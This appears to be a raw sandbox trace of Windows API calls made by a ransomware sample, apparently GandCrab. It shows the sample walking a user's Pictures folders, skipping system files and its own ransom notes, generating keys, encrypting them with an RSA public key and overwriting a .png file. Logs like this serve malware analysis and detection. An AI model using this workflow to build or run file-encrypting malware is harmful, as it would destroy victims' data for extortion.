77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0093.921] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0093.922] CloseHandle (hObject=0x2ac) returned 1 [0093.922] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.922] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.922] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x27, wMilliseconds=0xf0)) [0093.922] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.923] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0093.923] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0093.923] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\d2ca4a09d2ca4deb61a.lock") returned 67 [0093.923] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\camera roll\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0093.939] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.940] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.940] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\") returned 43 [0093.940] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\*" [0093.940] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x5038f8 [0093.940] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.940] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.941] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.941] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.942] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.942] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0093.942] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0093.942] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\d2ca4a09d2ca4deb61a.lock" [0093.942] lstrlenW (lpString=".titwmvjl") returned 9 [0093.942] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\d2ca4a09d2ca4deb61a.lock") returned 67 [0093.942] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.942] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 76 [0093.942] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\d2ca4a09d2ca4deb61a.lock") returned 67 [0093.942] lstrlenW (lpString=".lock") returned 5 [0093.942] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.942] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0093.942] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.943] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.943] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.943] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0093.943] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0093.943] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\desktop.ini" [0093.943] lstrlenW (lpString=".titwmvjl") returned 9 [0093.943] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\desktop.ini") returned 54 [0093.943] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.943] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\desktop.ini.titwmvjl") returned 63 [0093.943] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\desktop.ini") returned 54 [0093.943] lstrlenW (lpString=".ini") returned 4 [0093.943] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.944] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0093.944] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0093.944] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.944] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\desktop.ini") returned 54 [0093.944] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\desktop.ini") returned 54 [0093.944] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0093.944] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.944] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.944] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0093.944] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0093.944] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\TITWMVJL-DECRYPT.txt" [0093.944] lstrlenW (lpString=".titwmvjl") returned 9 [0093.944] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\TITWMVJL-DECRYPT.txt") returned 63 [0093.944] VirtualAlloc (lpAddress=0x0, dwSize=0xbe, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.945] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 72 [0093.945] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\TITWMVJL-DECRYPT.txt") returned 63 [0093.945] lstrlenW (lpString=".txt") returned 4 [0093.945] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.945] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0093.945] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0093.945] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.945] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\TITWMVJL-DECRYPT.txt") returned 63 [0093.945] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\TITWMVJL-DECRYPT.txt") returned 63 [0093.945] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0093.945] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0093.945] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0093.945] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0093.945] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0093.945] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0093.945] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0093.945] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0093.945] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.946] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0 [0093.946] FindClose (in: hFindFile=0x5038f8 | out: hFindFile=0x5038f8) returned 1 [0093.946] CloseHandle (hObject=0x2ac) returned 1 [0093.946] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.946] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0093.946] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0093.946] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\d2ca4a09d2ca4deb61a.lock" [0093.946] lstrlenW (lpString=".titwmvjl") returned 9 [0093.946] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\d2ca4a09d2ca4deb61a.lock") returned 55 [0093.946] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.946] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 64 [0093.946] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\d2ca4a09d2ca4deb61a.lock") returned 55 [0093.946] lstrlenW (lpString=".lock") returned 5 [0093.946] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.947] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0093.947] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.947] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.947] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.947] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0093.947] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0093.947] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\desktop.ini" [0093.947] lstrlenW (lpString=".titwmvjl") returned 9 [0093.947] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\desktop.ini") returned 42 [0093.947] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.947] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\desktop.ini.titwmvjl") returned 51 [0093.947] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\desktop.ini") returned 42 [0093.947] lstrlenW (lpString=".ini") returned 4 [0093.947] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.948] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0093.948] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0093.948] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.948] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\desktop.ini") returned 42 [0093.948] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\desktop.ini") returned 42 [0093.948] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0093.948] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.948] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.948] lstrcmpW (lpString1="HqptcqKhb rKrn.png", lpString2=".") returned 1 [0093.948] lstrcmpW (lpString1="HqptcqKhb rKrn.png", lpString2="..") returned 1 [0093.948] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="HqptcqKhb rKrn.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\HqptcqKhb rKrn.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\HqptcqKhb rKrn.png" [0093.948] lstrlenW (lpString=".titwmvjl") returned 9 [0093.948] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\HqptcqKhb rKrn.png") returned 49 [0093.948] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.948] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\HqptcqKhb rKrn.png.titwmvjl") returned 58 [0093.949] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\HqptcqKhb rKrn.png") returned 49 [0093.949] lstrlenW (lpString=".png") returned 4 [0093.949] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.949] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".png ") returned 5 [0093.949] lstrcmpiW (lpString1=".png", lpString2=".titwmvjl") returned -1 [0093.949] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.949] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\HqptcqKhb rKrn.png") returned 49 [0093.949] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\HqptcqKhb rKrn.png") returned 49 [0093.949] lstrcmpiW (lpString1="HqptcqKhb rKrn.png", lpString2="desktop.ini") returned 1 [0093.949] lstrcmpiW (lpString1="HqptcqKhb rKrn.png", lpString2="autorun.inf") returned 1 [0093.949] lstrcmpiW (lpString1="HqptcqKhb rKrn.png", lpString2="ntuser.dat") returned -1 [0093.949] lstrcmpiW (lpString1="HqptcqKhb rKrn.png", lpString2="iconcache.db") returned -1 [0093.950] lstrcmpiW (lpString1="HqptcqKhb rKrn.png", lpString2="bootsect.bak") returned 1 [0093.950] lstrcmpiW (lpString1="HqptcqKhb rKrn.png", lpString2="boot.ini") returned 1 [0093.950] lstrcmpiW (lpString1="HqptcqKhb rKrn.png", lpString2="ntuser.dat.log") returned -1 [0093.950] lstrcmpiW (lpString1="HqptcqKhb rKrn.png", lpString2="thumbs.db") returned -1 [0093.950] lstrcmpiW (lpString1="HqptcqKhb rKrn.png", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.950] lstrcmpiW (lpString1="HqptcqKhb rKrn.png", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.950] lstrcmpiW (lpString1="HqptcqKhb rKrn.png", lpString2="KRAB-DECRYPT.html") returned -1 [0093.950] lstrcmpiW (lpString1="HqptcqKhb rKrn.png", lpString2="CRAB-DECRYPT.html") returned 1 [0093.950] lstrcmpiW (lpString1="HqptcqKhb rKrn.png", lpString2="KRAB-DECRYPT.txt") returned -1 [0093.950] lstrcmpiW (lpString1="HqptcqKhb rKrn.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.950] lstrcmpiW (lpString1="HqptcqKhb rKrn.png", lpString2="ntldr") returned -1 [0093.950] lstrcmpiW (lpString1="HqptcqKhb rKrn.png", lpString2="NTDETECT.COM") returned -1 [0093.950] lstrcmpiW (lpString1="HqptcqKhb rKrn.png", lpString2="Bootfont.bin") returned 1 [0093.950] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\HqptcqKhb rKrn.png") returned 49 [0093.950] lstrlenW (lpString=".png") returned 4 [0093.950] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.950] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".png ") returned 5 [0093.950] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.950] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.951] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\HqptcqKhb rKrn.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\hqptcqkhb rkrn.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0093.951] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.951] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0093.952] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.952] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.952] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0093.952] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.953] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.953] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.953] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0093.953] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.953] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.953] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.953] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.953] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0093.954] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.954] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.954] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.954] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0093.954] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.954] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.954] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.954] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.954] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0093.955] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.955] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503738) returned 1 [0093.955] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.955] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0093.955] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.955] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0093.956] GetLastError () returned 0x0 [0093.956] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.956] CryptDestroyKey (hKey=0x503738) returned 1 [0093.956] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.956] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.956] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.956] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0093.956] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.957] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503938) returned 1 [0093.957] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.957] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0093.957] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.957] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0093.957] GetLastError () returned 0x0 [0093.957] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.957] CryptDestroyKey (hKey=0x503938) returned 1 [0093.957] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.957] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.958] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.958] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.958] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x59f5, lpOverlapped=0x0) returned 1 [0093.969] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffffa60b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.969] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x59f5, lpNumberOfBytesWritten=0x259f454, 